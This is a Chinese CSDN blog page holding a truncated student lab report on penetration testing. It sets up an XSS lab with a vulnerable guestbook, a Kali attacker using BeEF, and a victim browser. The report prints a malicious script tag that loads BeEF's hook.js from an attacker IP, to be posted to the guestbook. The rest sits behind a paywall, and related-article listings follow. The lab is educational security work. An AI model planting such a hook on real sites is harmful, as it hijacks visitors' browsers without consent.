网络渗透实验3

最新推荐文章于 2023-10-16 10:51:41 发布
最新推荐文章于 2023-10-16 10:51:41 发布
阅读量212 收藏 1
点赞数
文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mny38450/article/details/121910597
版权

1.实验目的  

理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

2.实验内容、原理

3. 实验过程

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

  1. 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 

2.Kali使用beef生成恶意代码,截图。

 

恶意代码:<script src="http://192.168.60.128 :3000/hook.js"></script>

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

最低0.47元/天 解锁文章
mny38450
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第一次网络渗透实验报告
willhell的博客
11-05 3714
网络渗透测试实验一:网络扫描与网络侦察1、网络扫描与网络侦察的目的2、Google Hacking(或baidu)3、BASE64编码 实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 ` 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 1、网络扫描与网络侦察的目的
网络渗透实验2
mny38450的博客
12-13 302
1.实验目的 1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。 2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。 3、能利用BrupSuite实现网站登录暴力破解获得登录密码。 4、能实现ZIP密码破解,理解安全密码的概念和设置。 系统环境:Kali Linux 2、
网络安全渗透测试实验
weixin_45807596的博客
12-20 266
网络安全渗透测试实验 一、环境搭建 网络拓扑图 Web服务器一: 10.10.10.129 192.168.126.128 数据库服务器: 10.10.10.136 10.10.1.134 Kali攻击机: 192.168.129.129 1、Web服务器一: ①基本信息 操作系统:Windows Server 2008 R2 网站管理:护卫神主机大师 webserve...
不知道如何测试?全网最全网络安全渗透测试流程给你答案!
2201_75735270的博客
10-16 1885
渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。
【白帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1548
【白帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
网络渗透实验四.docx
12-13
网络渗透实验四.docx
网络渗透实验三.docx
01-10
网络渗透实验三 本实验旨在了解网络渗透攻击的基本原理和防御方法,包括 XSS 攻击和 SQL 注入攻击。实验环境使用 Kali Linux 2 和 Windows Server,工具包括 Beef、AWVS 和 SqlMAP。 XSS 攻击部分: * 了解 XSS ...
网络渗透测试实验报告三
最新发布
12-27
网络渗透测试实验报告三
网络渗透测试实验报告二
12-27
网络渗透测试实验报告二
网络渗透实验二.docx
01-10
网络渗透实验二.docx
网络渗透试验一实验报告
weixin_51646864的博客
10-31 5632
网络渗透试验一实验报告 实验网络扫描与网络侦察 实验目的: 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2;Nmap(Kali);WinHex、数据恢复软件等 实验原理: 1、网络扫描与网络侦察的目的 搜集目标信息,采用七个基本的步骤: (1) 找到初始信息,比如一个IP地址或者一个域名; (2)
网络渗透试验(三)
qq_48489570的博客
12-01 542
实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境 Kali Linux 2、Windows Server 网络环境 交换网络结构 实验工具 Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤 XSS部分:利用Beef劫持被攻击者客户端浏览器。 角色:留言簿网站。存在
网络安全渗透测试实验
qq_60905276的博客
11-05 4799
理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境:Kali Linux 2、Windows网络环境:交换网络结构实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
三层网络渗透测试实验
lzyt_97的博客
06-19 2805
【第一层】 目标ip:192.168.31.207 访问目标ip发现是一个文件上传页面 经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径 访问返回的文件路径,成功连接到php大马 查看ip发现该主机是双网卡,第二层网络段为192.168.1.0/24 为进一步进行内网渗透,我们上传msf后门 后门制作: msfvenom -p linux/x64/meterpreter...
kali下beef使用
hackerie的博客
10-24 1万+
总结:其实,这几天挺受挫败感的,各种软件问题都没有解决,问题越积累越多。很多知识也是没有来得及学习,内心的捉急。 原本打算注册一个maltego的,但是需要谷歌验证码,而谷歌验证码则需要翻墙,可我是个成熟稳重、懂事听话的好孩子,怎么能翻墙呢?国内的资源就已经够用了。但是这次却gg了。不会翻墙,这让我十分的受挫。放松心情,开始第二个工具的使用,假装我已经有了注册码。 第二个使用的是一头牛。对,是牛
网络渗透测试实验
kistch的博客
11-21 3625
实验目的: 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 实验步骤: 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、手机位置定位。
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
网络安全实验4 SQL注入攻击
一半西瓜的博客
01-30 1万+
赞赏码 & 联系方式 & 个人闲话 【实验名称】SQL注入攻击 【实验目的】 1.了解SQL注入的基本原理 2.掌握PHP脚本访问MySQL数据库的基本方法 3.掌握程序设计中避免出现SQL注入漏洞的基本方法 【实验原理】 1.什么是SQL注入攻击 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服...
XSS和SQL注入
m0_46701146的博客
12-19 1140
实验三XSS注入 XSS注入
eLearnSecurity eCIR考试指南:网络渗透与NTA详解
章节3:网络包和流量分析 网络流量分析(NTA)是核心内容,它解释了什么是NTA及其关键利益。NTA的重要性在于帮助安全专业人员识别潜在威胁、追踪攻击路径并维护网络稳定。学习者会了解到如何监控和分析网络流量以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值